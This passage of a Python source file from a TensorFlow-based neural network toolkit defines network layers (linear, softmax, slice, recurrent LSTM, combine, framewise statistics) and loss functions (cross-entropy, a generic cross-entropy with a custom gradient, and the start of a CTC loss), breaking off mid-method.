session:\n \"\"\"\n for param_name, values in values_dict.items():\n param = self.params[param_name]\n assert isinstance(param, tf.Variable)\n shape = param.get_shape()\n assert isinstance(shape, tf.TensorShape)\n assert shape.is_fully_defined()\n assert tuple(shape.as_list()) == values.shape\n self.network.get_var_assigner(param).assign(values, session=session)\n\n def get_param_values_dict(self, session):\n \"\"\"\n :param tf.Session session:\n :return: dict name -> values\n :rtype: dict[str,numpy.ndarray]\n \"\"\"\n d = {}\n for param_name, param in self.params.items():\n d[param_name] = param.eval(session)\n return d\n\n def _get_target_value(self, mark_data_key_as_used=True):\n \"\"\"\n :param bool mark_data_key_as_used: forwarded self.network.get_extern_data()\n :rtype: Data | None\n \"\"\"\n if not self.target or self.target == \"none\":\n return None\n if self.network.extern_data.has_data(self.target):\n return self.network.get_extern_data(self.target, mark_data_key_as_used=mark_data_key_as_used)\n if self.target in self.network.layers:\n return self.network.layers[self.target].output\n raise Exception(\"target %r unknown\" % self.target)\n\n def _init_loss(self):\n if self.loss.output is self.output:\n return\n self.loss.init(\n output=self.output,\n output_with_activation=self.output_before_activation,\n target=self._get_target_value())\n\n def get_loss_value(self):\n \"\"\"\n :return: the loss, a scalar value, or None if not set\n :rtype: tf.Tensor | None\n \"\"\"\n if not self.loss:\n return None\n self._init_loss()\n with tf.name_scope(\"loss\"):\n return self.loss.get_value()\n\n def get_error_value(self):\n \"\"\"\n :return: usually the frame error rate, or None if not defined\n :rtype: tf.Tensor | None\n \"\"\"\n if not self.loss:\n return None\n self._init_loss()\n with tf.name_scope(\"error\"):\n return self.loss.get_error()\n\n def get_params_l2_norm(self):\n return 2 * sum([tf.nn.l2_loss(param) for (name, param) in sorted(self.params.items())])\n\n def get_constraints_value(self):\n c = 0\n if self.L2:\n c += self.L2 * self.get_params_l2_norm()\n if c is 0:\n return None\n return c\n\n\nclass SourceLayer(LayerBase):\n layer_class = \"source\"\n\n def __init__(self, network, data_key=None, sources=(), **kwargs):\n \"\"\"\n :param TFNetwork.TFNetwork network:\n :param str|None data_key:\n :param tuple sources:\n \"\"\"\n if data_key is None:\n data_key = network.extern_data.default_input\n assert not sources, \"source layer does not expect sources\"\n data = network.get_extern_data(data_key)\n super(SourceLayer, self).__init__(out_type=data.get_kwargs(), network=network, **kwargs)\n self.output = data\n\n\ndef concat_sources(src_layers):\n \"\"\"\n :param list[LayerBase] src_layers:\n :return: data with placeholders set\n :rtype: Data\n \"\"\"\n assert src_layers, \"need source layers\"\n if len(src_layers) == 1:\n return src_layers[0].output\n assert not src_layers[0].output.sparse, \"sparse concat not supported\"\n shape = src_layers[0].output.shape # without batch-dim\n assert shape, \"source must not be a scalar of layer %r\" % src_layers[0]\n prefix_shape = shape[:-1]\n dim = 0\n dtype = src_layers[0].output.dtype\n batch_dim_axis = src_layers[0].output.batch_dim_axis\n time_dim_axis = src_layers[0].output.time_dim_axis\n for layer in src_layers:\n assert layer.output.dtype == dtype, \"incompatible dtype with layer %r\" % layer\n assert layer.output.batch_dim_axis == batch_dim_axis\n assert layer.output.time_dim_axis == time_dim_axis\n shape = layer.output.shape\n 
assert layer.output.placeholder.get_shape().ndims == len(shape) + 1 # with batch-dim\n assert shape, \"source must not be a scalar of layer %r\" % layer\n assert shape[:-1] == prefix_shape, \"incompatible concat with layer %r\" % layer\n assert shape[-1], \"source last-dim must be specified of layer %r\" % layer\n dim += shape[-1]\n data = Data(\n name=\"concat_sources\",\n shape=prefix_shape + (dim,),\n dim=dim,\n sparse=False,\n batch_dim_axis=batch_dim_axis,\n time_dim_axis=time_dim_axis,\n dtype=dtype)\n data.placeholder = tf.concat(\n concat_dim=len(prefix_shape) + 1, # one more because this is with batch-dim\n values=[layer.output.placeholder for layer in src_layers])\n data.size_placeholder = src_layers[0].output.size_placeholder.copy()\n return data\n\n\nclass _ConcatInputLayer(LayerBase):\n def __init__(self, dropout=0, mask=None, **kwargs):\n \"\"\"\n :param float dropout:\n :param str|None mask: \"dropout\" or \"unity\" or None\n \"\"\"\n super(_ConcatInputLayer, self).__init__(**kwargs)\n input_data = concat_sources(self.sources)\n\n if self.network.train_flag:\n assert mask in ['dropout', 'unity', None], \"invalid mask: %r\" % mask\n if mask == \"dropout\" or (mask is None and dropout > 0):\n assert 0.0 < dropout < 1.0\n input_data.placeholder = tf.nn.dropout(\n input_data.placeholder,\n keep_prob=1 - dropout,\n # noise_shape is like old behavior for now:\n # all dynamic dimensions (batch,time) will use the same dropout-mask broadcasted.\n noise_shape=input_data.default_broadcast_noise_shape,\n seed=self.network.random.randint(2**31))\n\n self.input_data = input_data\n\n\nclass CopyLayer(_ConcatInputLayer):\n layer_class = \"copy\"\n\n def __init__(self, **kwargs):\n # Dummy out_type for now, will reset layer.\n super(CopyLayer, self).__init__(out_type={\"shape\": ()}, **kwargs)\n self.output = self.input_data\n\n\nclass SliceLayer(_ConcatInputLayer):\n layer_class = \"slice\"\n\n def __init__(self, axis=None, axis_kind=None,\n slice_start=None, slice_end=None, slice_step=None,\n **kwargs):\n \"\"\"\n :param int|None axis:\n :param str|None axis_kind: \"T\" for time, \"B\" for batch, \"F\" for feature\n :param int|None slice_start:\n :param int|None slice_end:\n :param int|None slice_step:\n :param int|None n_out:\n \"\"\"\n # Dummy out_type for now, will reset layer.\n super(SliceLayer, self).__init__(out_type={\"shape\": ()}, **kwargs)\n if axis is not None:\n assert not axis_kind\n assert 0 <= axis < len(self.input_data.batch_shape)\n else:\n assert axis_kind\n axis_kind = axis_kind.upper()\n if axis_kind == \"T\":\n assert self.input_data.time_dim_axis is not None\n axis = self.input_data.time_dim_axis\n elif axis_kind == \"B\":\n assert self.input_data.batch_dim_axis is not None\n axis = self.input_data.batch_dim_axis\n elif axis_kind == \"F\":\n axes = self.input_data.get_axes(exclude_time=True, exclude_batch=True)\n assert len(axes) == 1\n axis = axes[0]\n dim_slice = slice(slice_start, slice_end, slice_step)\n slices = [slice(None, None)] * axis + [dim_slice]\n out_type = self.input_data.get_kwargs()\n axis_wo_batch = self.input_data.get_batch_axis_excluding_batch(axis)\n if axis_wo_batch is not None:\n out_type[\"shape\"] = list(out_type[\"shape\"])\n if out_type[\"shape\"][axis_wo_batch] is not None:\n out_type[\"shape\"][axis_wo_batch] = len(range(out_type[\"shape\"][axis_wo_batch])[dim_slice])\n if axis_wo_batch == len(out_type[\"shape\"]) - 1 and not out_type[\"sparse\"]:\n out_type[\"dim\"] = out_type[\"shape\"][axis_wo_batch]\n self.output = Data(**out_type)\n 
self.output.size_placeholder = self.input_data.size_placeholder\n if axis == self.input_data.time_dim_axis:\n if slice_start:\n assert slice_start > 0\n self.output.size_placeholder[self.input_data.time_dim_axis_excluding_batch] = \\\n tf.maximum(0, self.output.size_placeholder[self.input_data.time_dim_axis_excluding_batch] - slice_start)\n if slice_end:\n assert slice_end > 0\n self.output.size_placeholder[self.input_data.time_dim_axis_excluding_batch] = \\\n tf.minimum(\n tf.shape(self.input_data.placeholder)[self.input_data.time_dim_axis] - slice_end,\n self.output.size_placeholder[self.input_data.time_dim_axis_excluding_batch])\n if slice_step:\n self.output.size_placeholder[self.input_data.time_dim_axis_excluding_batch] //= slice_step\n elif axis_wo_batch is not None:\n assert axis_wo_batch not in self.output.size_placeholder\n self.output.placeholder = self.input_data.placeholder[slices]\n\n\nclass LinearLayer(_ConcatInputLayer):\n layer_class = \"linear\"\n\n def __init__(self, activation, with_bias=True, **kwargs):\n super(LinearLayer, self).__init__(**kwargs)\n\n self.activation = activation\n self.with_bias = with_bias\n\n input_data = self.input_data\n n_in = input_data.dim\n n_out = self.output.dim\n assert n_in and n_out, \"%r and %r\" % (input_data, self.output)\n\n W = self.add_param(\n tf.Variable(\n name=\"W\",\n initial_value=tf.contrib.layers.xavier_initializer(seed=self.network.random.randint(2**31))(\n shape=(n_in, n_out))))\n\n if self.with_bias:\n b = self.add_param(tf.Variable(\n name=\"b\",\n initial_value=tf.constant_initializer(value=0, dtype=tf.float32)(\n shape=(n_out,))))\n else:\n b = None\n\n with tf.name_scope(\"linear\"):\n from TFUtil import dot\n x = input_data.placeholder\n ndim = x.get_shape().ndims\n\n if self.input_data.sparse:\n x = tf.nn.embedding_lookup(W, x)\n ndim += 1\n else:\n x = dot(x, W)\n assert x.get_shape().ndims == ndim\n\n if self.with_bias:\n x = tf.add(x, b, name=\"add_bias\")\n assert x.get_shape().ndims == ndim\n\n if self.activation:\n from TFUtil import get_activation_function\n act_func = get_activation_function(self.activation)\n self.output_before_activation = OutputWithActivation(x, act_func=act_func)\n else:\n self.output_before_activation = OutputWithActivation(x)\n x = self.output_before_activation.y\n\n self.output.batch_dim_axis = self.input_data.batch_dim_axis\n self.output.time_dim_axis = self.input_data.time_dim_axis\n self.output.placeholder = x\n\n\nclass SoftmaxLayer(LinearLayer):\n layer_class = \"softmax\"\n\n def __init__(self, activation=\"softmax\", **kwargs):\n super(SoftmaxLayer, self).__init__(activation=activation, **kwargs)\n\n\nclass RecLayer(_ConcatInputLayer):\n layer_class = \"rec\"\n recurrent = True\n _rnn_cells_dict = {}\n\n @classmethod\n def _create_rnn_cells_dict(cls):\n from tensorflow.python.ops import rnn_cell\n import tensorflow.contrib.rnn as rnn_contrib\n import TFNativeOp\n def maybe_add(key, v):\n if isinstance(v, type) and issubclass(v, (rnn_cell.RNNCell, rnn_contrib.FusedRNNCell, TFNativeOp.RecSeqCellOp)):\n name = key\n if name.endswith(\"Cell\"):\n name = name[:-len(\"Cell\")]\n name = name.lower()\n assert name not in cls._rnn_cells_dict\n cls._rnn_cells_dict[name] = v\n for key, v in vars(rnn_cell).items():\n maybe_add(key, v)\n for key, v in vars(rnn_contrib).items():\n maybe_add(key, v)\n for key, v in vars(TFNativeOp).items():\n maybe_add(key, v)\n\n def __init__(self, unit=\"lstm\", bidirectional=False, direction=None, input_projection=True, **kwargs):\n \"\"\"\n :param str 
unit: the RNNCell/etc name, e.g. \"nativelstm\". see comment below\n :param bool bidirectional: whether we should combine a forward and backward cell\n :param int|None direction: None|1 -> forward, -1 -> backward\n :param bool input_projection: True -> input is multiplied with matrix. False only works if same input dim\n :param dict[str] kwargs: passed on to base class\n \"\"\"\n super(RecLayer, self).__init__(**kwargs)\n from tensorflow.python.ops import rnn, rnn_cell\n import tensorflow.contrib.rnn as rnn_contrib\n import TFNativeOp\n from TFUtil import swapaxes, dot, sequence_mask_time_major, directed\n if unit in [\"lstmp\", \"lstm\"]:\n # Some possible LSTM implementations are:\n # * BasicLSTM, via official TF, pure TF implementation\n # * LSTMBlockFused, via tf.contrib.rnn (both CPU and GPU). should be much faster than BasicLSTM\n # * NativeLSTM, our own native LSTM (both CPU and GPU). should be faster than LSTMBlockFused\n # We default to the fastest one, i.e. NativeLSTM.\n # Note that they are currently not compatible to each other, i.e. the way the parameters are represented.\n unit = \"nativelstm\"\n if direction is not None:\n assert not bidirectional\n assert direction in [-1, 1]\n if not self._rnn_cells_dict:\n self._create_rnn_cells_dict()\n rnn_cell_class = self._rnn_cells_dict[unit.lower()]\n with tf.variable_scope(\n \"rec\",\n initializer=tf.contrib.layers.xavier_initializer(\n seed=self.network.random.randint(2**31))) as scope:\n assert isinstance(scope, tf.VariableScope)\n scope_name_prefix = scope.name + \"/\" # e.g. \"layer1/rec/\"\n n_hidden = self.output.dim\n if bidirectional:\n assert n_hidden % 2 == 0\n n_hidden //= 2\n cell_fw = rnn_cell_class(n_hidden)\n assert isinstance(cell_fw, (rnn_cell.RNNCell, rnn_contrib.FusedRNNCell, TFNativeOp.RecSeqCellOp)) # e.g. BasicLSTMCell\n if bidirectional:\n cell_bw = rnn_cell_class(n_hidden)\n else:\n cell_bw = None\n x = self.input_data.placeholder # (batch,time,dim) or (time,batch,dim)\n if not self.input_data.is_time_major:\n assert self.input_data.batch_dim_axis == 0\n assert self.input_data.time_dim_axis == 1\n x = swapaxes(x, 0, 1) # (time,batch,[dim])\n seq_len = self.input_data.size_placeholder[0]\n if isinstance(cell_fw, (rnn_cell.RNNCell, rnn_contrib.FusedRNNCell)):\n assert not self.input_data.sparse\n assert input_projection\n if direction == -1:\n x = tf.reverse_sequence(x, seq_lengths=seq_len, batch_dim=1, seq_dim=0)\n if isinstance(cell_fw, rnn_cell.RNNCell): # e.g. BasicLSTMCell\n if bidirectional:\n # Will get (time,batch,ydim/2).\n (y_fw, y_bw), _ = rnn.bidirectional_dynamic_rnn(\n cell_fw=cell_fw, cell_bw=cell_bw,\n inputs=x, time_major=True, sequence_length=seq_len,\n dtype=tf.float32)\n y = tf.concat(2, (y_fw, y_bw)) # (time,batch,ydim)\n else:\n # Will get (time,batch,ydim).\n y, _ = rnn.dynamic_rnn(cell=cell_fw, inputs=x, time_major=True, sequence_length=seq_len, dtype=tf.float32)\n elif isinstance(cell_fw, rnn_contrib.FusedRNNCell): # e.g. 
LSTMBlockFusedCell\n if bidirectional:\n raise NotImplementedError\n # Will get (time,batch,ydim).\n y, _ = cell_fw(inputs=x, sequence_length=seq_len, dtype=tf.float32)\n else:\n raise Exception(\"invalid type: %s\" % type(cell_fw))\n if direction == -1:\n y = tf.reverse_sequence(y, seq_lengths=seq_len, batch_dim=1, seq_dim=0)\n elif isinstance(cell_fw, TFNativeOp.RecSeqCellOp):\n assert not bidirectional\n if input_projection:\n W = tf.get_variable(name=\"W\", shape=(self.input_data.dim, cell_fw.n_input_dim), dtype=tf.float32)\n if self.input_data.sparse:\n x = tf.nn.embedding_lookup(W, x)\n else:\n x = dot(x, W)\n else:\n assert not self.input_data.sparse\n assert self.input_data.dim == cell_fw.n_input_dim\n b = tf.get_variable(name=\"b\", shape=(cell_fw.n_input_dim,), dtype=tf.float32, initializer=tf.constant_initializer(0.0))\n x += b\n index = sequence_mask_time_major(seq_len, maxlen=tf.shape(x)[0])\n y = cell_fw(inputs=directed(x, direction), index=directed(index, direction))\n y = directed(y, direction)\n else:\n raise Exception(\"invalid type: %s\" % type(cell_fw))\n self.output.time_dim_axis = 0\n self.output.batch_dim_axis = 1\n self.output.placeholder = y\n params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope_name_prefix)\n assert params\n self.params.update({p.name[len(scope_name_prefix):-2]: p for p in params})\n\n\nclass FsaLayer(LayerBase):\n layer_class = \"fsa\"\n\n def __init__(self, **kwargs):\n \"\"\"\n \"\"\"\n super(FsaLayer, self).__init__(**kwargs)\n # TODO...\n\n\nclass CombineLayer(LayerBase):\n layer_class = \"combine\"\n\n # All ops require the same input shape and yield the same output shape. (For now)\n @classmethod\n def _op_kind_average(cls, sources):\n \"\"\"\n :param list[LayerBase] sources:\n :rtype: tf.Tensor\n \"\"\"\n x = sources[0].output.placeholder\n for source in sources[1:]:\n x += source.output.placeholder\n x /= len(sources)\n return x\n\n def __init__(self, kind, sources, **kwargs):\n \"\"\"\n :param str kind:\n :param list[LayerBase] sources:\n \"\"\"\n assert sources\n kwargs = kwargs.copy()\n if \"n_out\" not in kwargs and \"out_type\" not in kwargs:\n kwargs[\"out_type\"] = sources[0].output.get_kwargs()\n kwargs[\"out_type\"][\"name\"] = \"%s_output\" % kwargs[\"name\"]\n super(CombineLayer, self).__init__(sources=sources, **kwargs)\n assert not self.output.sparse\n for source in sources:\n assert source.output.shape == self.output.shape\n assert source.output.batch_dim_axis == self.output.batch_dim_axis\n assert source.output.time_dim_axis == self.output.time_dim_axis\n op = getattr(self, \"_op_kind_%s\" % kind)\n self.output.placeholder = op(sources)\n\n\nclass FramewiseStatisticsLayer(LayerBase):\n layer_class = \"framewise_statistics\"\n\n def __init__(self, sil_label_idx, histogram_num_bins=20, **kwargs):\n # n_out=1 is a workaround for now. Our output should not be used. 
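CombineLayer above resolves its `kind` string to an implementation with `getattr(self, "_op_kind_%s" % kind)`, so adding a combination op only means defining another method that follows the naming convention. A minimal sketch of that dispatch pattern; the `sum` op here is a hypothetical extra, not part of the layer in the record:

```python
class Combine:
    """Sketch of CombineLayer's getattr-based op dispatch."""

    @classmethod
    def _op_kind_average(cls, xs):
        return sum(xs) / len(xs)

    @classmethod
    def _op_kind_sum(cls, xs):  # hypothetical extra op, not in the layer above
        return sum(xs)

    @classmethod
    def apply(cls, kind, xs):
        # Unknown kinds fail loudly with an AttributeError, as in the layer.
        op = getattr(cls, "_op_kind_%s" % kind)
        return op(xs)

assert Combine.apply("average", [1.0, 2.0, 3.0]) == 2.0
assert Combine.apply("sum", [1.0, 2.0, 3.0]) == 6.0
```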
We have none.\n super(FramewiseStatisticsLayer, self).__init__(n_out=1, **kwargs)\n self.output.placeholder = tf.constant(0, name=\"dummy\")\n assert self.sources, \"give me some sources\"\n # Currently, a bit hardcoded.\n # We expect a framewise hard alignment, and calculate FER, CE, perplexity,\n # for all frames, frames without silence, and silence frames.\n from TFUtil import flatten_with_seq_len_mask\n import numpy\n source = self.sources[0]\n output = source.output\n target = source._get_target_value()\n assert target.sparse\n assert source.output_before_activation.act_func is tf.nn.softmax\n output_seq_lens = output.size_placeholder[0]\n output_before_softmax_flat = flatten_with_seq_len_mask(source.output_before_activation.x, output_seq_lens, time_major=output.is_time_major)\n target_seq_lens = target.size_placeholder[0]\n target_flat = flatten_with_seq_len_mask(target.placeholder, target_seq_lens, time_major=target.is_time_major)\n target_flat.set_shape(tf.TensorShape([tf.Dimension(None)]))\n loss_ce = tf.nn.sparse_softmax_cross_entropy_with_logits(output_before_softmax_flat, target_flat)\n flat_last_dim = output_before_softmax_flat.get_shape().ndims - 1\n assert flat_last_dim == 1\n output_flat = flatten_with_seq_len_mask(output.placeholder, output_seq_lens, time_major=output.is_time_major)\n output_flat_argmax = tf.cast(tf.arg_max(output_before_softmax_flat, dimension=flat_last_dim), \"int32\")\n frame_error = tf.not_equal(output_flat_argmax, target_flat)\n # target_flat is shape (time,) -> index.\n target_flat_exp = tf.pack([tf.range(tf.shape(target_flat)[0], dtype=tf.int32), target_flat], axis=1)\n true_label_prob = tf.gather_nd(output_flat, target_flat_exp)\n true_label_prob.set_shape(tf.TensorShape([tf.Dimension(None)]))\n true_label_prob_i32 = tf.clip_by_value(\n tf.cast(tf.round(true_label_prob * histogram_num_bins), tf.int32), 0, histogram_num_bins - 1)\n true_label_prob_histogram = tf.stack(\n [tf.equal(true_label_prob_i32, i) for i in range(histogram_num_bins)], axis=1)\n true_label_prob_histogram.set_shape(tf.TensorShape([tf.Dimension(None), tf.Dimension(histogram_num_bins)]))\n\n mask_no_sil = tf.not_equal(target_flat, sil_label_idx)\n mask_sil = tf.equal(target_flat, sil_label_idx)\n seq_len = tf.reduce_sum(target_seq_lens)\n seq_len_sil = tf.reduce_sum(tf.cast(mask_sil, tf.int32))\n seq_len_no_sil = tf.reduce_sum(tf.cast(mask_no_sil, tf.int32))\n\n accumulated_seq_len = tf.Variable(initial_value=0, dtype=tf.int64, trainable=False, name=\"accumulated_seq_len\")\n accumulated_seq_len_sil = tf.Variable(initial_value=0, dtype=tf.int64, trainable=False, name=\"accumulated_seq_len_sil\")\n accumulated_seq_len = tf.assign_add(accumulated_seq_len, tf.cast(seq_len, tf.int64))\n accumulated_seq_len_sil = tf.assign_add(accumulated_seq_len_sil, tf.cast(seq_len_sil, tf.int64))\n accumulated_seq_len_no_sil = accumulated_seq_len - accumulated_seq_len_sil\n\n self.stats[\"batch_seq_length\"] = seq_len\n self.stats[\"batch_seq_length_sil\"] = seq_len_sil\n self.stats[\"batch_seq_length_no_sil\"] = seq_len_no_sil\n self.stats[\"accumulated_seq_length\"] = accumulated_seq_len\n self.stats[\"accumulated_seq_length_sil\"] = accumulated_seq_len_sil\n self.stats[\"accumulated_seq_length_no_sil\"] = accumulated_seq_len_no_sil\n\n for _k, _v in {\n \"loss_ce\": loss_ce,\n \"frame_error\": frame_error,\n \"true_label_prob_histogram\": true_label_prob_histogram}.items():\n for _k2 in [\"\", \"_sil\", \"_no_sil\"]:\n k = _k + _k2\n v = _v\n acc_seq_len = accumulated_seq_len\n if 
k.endswith(\"_no_sil\"):\n v = tf.boolean_mask(v, mask_no_sil)\n acc_seq_len = accumulated_seq_len_no_sil\n elif k.endswith(\"_sil\"):\n v = tf.boolean_mask(v, mask_sil)\n acc_seq_len = accumulated_seq_len_sil\n v_f32 = tf.cast(v, tf.float32)\n self.stats[\"batch_%s\" % k] = tf.reduce_mean(v_f32, axis=0)\n if v.dtype.is_floating:\n acc_dtype = \"float64\"\n else:\n acc_dtype = \"int64\"\n acc_shape = v.get_shape().as_list()[1:]\n assert all(acc_shape)\n acc_v = tf.Variable(initial_value=numpy.zeros(acc_shape, dtype=acc_dtype), dtype=acc_dtype, trainable=False, name=\"accumulated_%s\" % k)\n acc_v = tf.assign_add(acc_v, tf.reduce_sum(tf.cast(v, acc_dtype), axis=0))\n self.stats[\"accumulated_%s\" % k] = tf.cast(acc_v, tf.float64) / tf.cast(acc_seq_len, tf.float64)\n\n self.stats[\"batch_loss_perplexity\"] = tf.exp(self.stats[\"batch_loss_ce\"])\n self.stats[\"batch_loss_perplexity_sil\"] = tf.exp(self.stats[\"batch_loss_ce_sil\"])\n self.stats[\"batch_loss_perplexity_no_sil\"] = tf.exp(self.stats[\"batch_loss_ce_no_sil\"])\n self.stats[\"accumulated_loss_perplexity\"] = tf.exp(self.stats[\"accumulated_loss_ce\"])\n self.stats[\"accumulated_loss_perplexity_sil\"] = tf.exp(self.stats[\"accumulated_loss_ce_sil\"])\n self.stats[\"accumulated_loss_perplexity_no_sil\"] = tf.exp(self.stats[\"accumulated_loss_ce_no_sil\"])\n\n\nclass Loss(object):\n class_name = None\n recurrent = False # if this is a frame-wise criteria, this will be False\n\n def __init__(self):\n # All are initialized in self.init().\n self.output = None # type: Data\n self.time_major = None # type: bool|None\n self.output_with_activation = None # type: OutputWithActivation\n self.output_seq_lens = None # type: tf.Tensor\n self.target = None # type: Data\n self.target_seq_lens = None # type: tf.Tensor\n self.output_flat = None # type: tf.Tensor\n self.output_before_softmax_flat = None # type: tf.Tensor\n self.target_flat = None # type: tf.Tensor\n # Maybe make configurable. 
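The framewise statistics above rest on two simple pieces: boolean masks that partition the flat frame sequence into silence and non-silence parts (`tf.boolean_mask`), and perplexity defined as exp of the mean per-frame cross-entropy. A plain-NumPy sketch of both — the label values and loss numbers are made up for illustration:

```python
import numpy as np

target = np.array([0, 3, 0, 2, 1])             # frame-wise labels, 0 = silence
loss_ce = np.array([0.1, 0.9, 0.2, 0.4, 0.7])  # made-up per-frame CE values
sil_idx = 0

mask_sil = target == sil_idx
mask_no_sil = ~mask_sil

for name, mask in [("all", np.ones_like(mask_sil)),
                   ("sil", mask_sil),
                   ("no_sil", mask_no_sil)]:
    ce = loss_ce[mask].mean()                  # mean CE over the masked frames
    print("%7s  ce=%.3f  perplexity=%.3f" % (name, ce, np.exp(ce)))
```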
For now, same as in our Theano behavior.\n self.reduce_func = tf.reduce_sum # or tf.reduce_mean\n\n def init(self, output, output_with_activation=None, target=None):\n \"\"\"\n :param Data output: generated output\n :param OutputWithActivation|None output_with_activation:\n :param Data target: reference target from dataset\n \"\"\"\n from TFUtil import flatten_with_seq_len_mask\n with tf.name_scope(\"loss_init\"):\n self.output = output\n self.output_with_activation = output_with_activation\n self.output_seq_lens = output.size_placeholder[0]\n self.target = target\n self.target_seq_lens = target.size_placeholder[0]\n # Flat variants are with batch,time collapsed into one, masked via seq_lens.\n self.output_flat = None\n self.output_before_softmax_flat = None\n if output_with_activation:\n assert output_with_activation.y is output.placeholder\n if output_with_activation and output_with_activation.act_func is tf.nn.softmax:\n self.output_before_softmax_flat = flatten_with_seq_len_mask(output_with_activation.x, self.output_seq_lens, time_major=output.is_time_major)\n else:\n self.output_flat = flatten_with_seq_len_mask(output.placeholder, self.output_seq_lens, time_major=output.is_time_major)\n self.target_flat = flatten_with_seq_len_mask(target.placeholder, self.target_seq_lens, time_major=target.is_time_major)\n\n def get_error(self):\n \"\"\"\n :return: frame error rate as a scalar value\n :rtype: tf.Tensor\n \"\"\"\n with tf.name_scope(\"loss_frame_error\"):\n from TFUtil import check_input_ndim, check_shape_equal\n output_flat = self.output_before_softmax_flat\n if output_flat is None:\n output_flat = self.output_flat\n output_flat = check_input_ndim(output_flat, ndim=2)\n last_dim = tf.rank(output_flat) - 1 # should be 1\n output_label = tf.cast(tf.arg_max(output_flat, dimension=last_dim), \"int32\")\n if self.target.sparse:\n target_label = check_input_ndim(self.target_flat, ndim=1)\n else:\n target_flat = check_shape_equal(self.target_flat, output_flat)\n target_label = tf.cast(tf.arg_max(target_flat, dimension=last_dim), \"int32\")\n not_equal = tf.not_equal(output_label, target_label)\n return self.reduce_func(tf.cast(not_equal, \"float32\"))\n\n def get_value(self):\n \"\"\"\n :return: loss as a scalar value\n :rtype: tf.Tensor\n \"\"\"\n raise NotImplementedError\n\n def get_auto_output_layer_dim(self, target_dim):\n \"\"\"\n :param int target_dim:\n :return: normally just the same as target_dim. e.g. 
for CTC, we would add 1 for the blank label\n :rtype: int\n \"\"\"\n return target_dim\n\n\nclass CrossEntropyLoss(Loss):\n class_name = \"ce\"\n\n def get_value(self):\n with tf.name_scope(\"loss_ce\"):\n if self.target.sparse:\n if self.output_before_softmax_flat is not None:\n out = tf.nn.sparse_softmax_cross_entropy_with_logits(self.output_before_softmax_flat, self.target_flat)\n return self.reduce_func(out)\n else:\n target_flat_exp = tf.pack([tf.range(tf.shape(self.target_flat)[0], dtype=tf.int32), self.target_flat], axis=1) # (time,2)\n out = tf.log(tf.gather_nd(self.output_flat, target_flat_exp))\n return -self.reduce_func(out)\n else: # not sparse\n if self.output_before_softmax_flat is not None:\n out = tf.nn.softmax_cross_entropy_with_logits(self.output_before_softmax_flat, self.target_flat)\n return self.reduce_func(out)\n else:\n out = self.target_flat * tf.log(self.output_flat)\n return -self.reduce_func(out)\n\n\nclass GenericCELoss(Loss):\n class_name = \"generic_ce\"\n\n def __init__(self, **kwargs):\n super(GenericCELoss, self).__init__(**kwargs)\n\n def loss(z, y, grad_f, target):\n nlog_scores = -tf.log(tf.clip_by_value(y, 1.e-20, 1.e20)) # (time,dim)\n # target is shape (time,) -> index.\n target_exp = tf.pack([tf.range(tf.shape(target)[0], dtype=tf.int32), target], axis=1) # (time,2)\n # Thus K == 2. gather_nd out will be (target_exp.shape[0],) = (time,).\n gathered = tf.gather_nd(nlog_scores, target_exp) # (time,)\n return self.reduce_func(gathered)\n\n def loss_grad(op, grad):\n \"\"\"\n :param tf.Operation op:\n :param tf.Tensor grad: grad for loss\n :return: grad for op.inputs\n \"\"\"\n z, y, grad_f, target = op.inputs\n num_classes = tf.shape(z)[-1]\n bw = tf.one_hot(target, depth=num_classes)\n grad_z = grad_f * (y - bw)\n return grad_z, None, None, None # for each input\n\n # We need to create the loss func here in __init__ to register it in the default graph as early as possible,\n # before we create the TF session.\n from TFUtil import custom_gradient\n self._loss_func = custom_gradient.register(\n [tf.float32, tf.float32, tf.float32, tf.int32], op=loss, grad_op=loss_grad)\n\n def get_value(self):\n # Should be generic for any activation function.\n # (Except when the labels are not independent, such as for softmax.)\n # See Theano NetworkOutputLayer.FramewiseOutputLayer.cost() with \"generic_ce\" loss.\n from TFUtil import flatten_with_seq_len_mask\n # activation function can be anything, e.g. exp or sigmoid, but not softmax, must be elemwise.\n assert self.output_with_activation\n x = self.output_with_activation.x\n y = self.output_with_activation.y\n grad_f, = tf.gradients(tf.log(y), x)\n assert grad_f is not None\n grad_f = flatten_with_seq_len_mask(grad_f, seq_lens=self.output_seq_lens, time_major=self.output.is_time_major)\n x = flatten_with_seq_len_mask(x, seq_lens=self.output_seq_lens, time_major=self.output.is_time_major)\n y = flatten_with_seq_len_mask(y, seq_lens=self.output_seq_lens, time_major=self.output.is_time_major)\n assert y.get_shape().ndims == 2\n y /= tf.reduce_sum(y, axis=1, keep_dims=True)\n assert self.output.dim == self.target.dim\n assert self.target.sparse\n return self._loss_func(x, y, grad_f, self.target_flat)\n\n\nclass CtcLoss(Loss):\n class_name = \"ctc\"\n recurrent = True\n\n def __init__(self, target_collapse_repeated=False, auto_clip_target_len=False):\n \"\"\"\n :param bool target_collapse_repeated: like preprocess_collapse_repeated option for CTC. 
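Both sparse cross-entropy paths above select the probability of the true class per frame with `tf.pack` plus `tf.gather_nd` (the old TF 0.x API: `tf.pack` later became `tf.stack`). In NumPy the same selection is a one-line advanced-indexing expression, which makes the trick easier to see:

```python
import numpy as np

probs = np.array([[0.7, 0.2, 0.1],
                  [0.1, 0.8, 0.1]])   # softmax outputs, shape (frames, classes)
target = np.array([0, 1])             # sparse label per frame

# Pair each frame index with its label to select the true-class probability.
true_class_prob = probs[np.arange(len(target)), target]   # [0.7, 0.8]
ce = -np.log(true_class_prob).sum()
print("cross-entropy: %.4f" % ce)     # -(log 0.7 + log 0.8) ~ 0.5798
```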
used for sparse_labels().\n :param bool auto_clip_target_len: see self._get_target_sparse_labels().\n \"\"\"\n super(CtcLoss, self).__init__()\n self.target_collapse_repeated = target_collapse_repeated\n self.auto_clip_target_len = auto_clip_target_len\n self._target_sparse_labels = None\n\n def init(self, **kwargs):\n self._target_sparse_labels = None\n super(CtcLoss, self).init(**kwargs)\n\n def _get_target_sparse_labels(self):\n if self._target_sparse_labels is not None:\n return self._target_sparse_labels\n from TFUtil import sparse_labels\n target_seq_lens = self.target_seq_lens\n if self.auto_clip_target_len:\n # Not more than output_seq_lens, otherwise we can get an exception by the CTC algorithm\n # \"Not enough time for target transition sequence\".\n # One less to allow for at least one blank somewhere.\n target_seq_lens = tf.minimum(target_seq_lens, tf.maximum(self.output_seq_lens - 1, 0))\n labels = sparse_labels(self.target.placeholder, target_seq_lens,\n collapse_repeated=self.target_collapse_repeated)\n self._target_sparse_labels = labels\n return labels\n\n def get_value(self):\n if not self.target.sparse:\n raise Exception(\"CTC target expected to be sparse (symbols)\")\n with 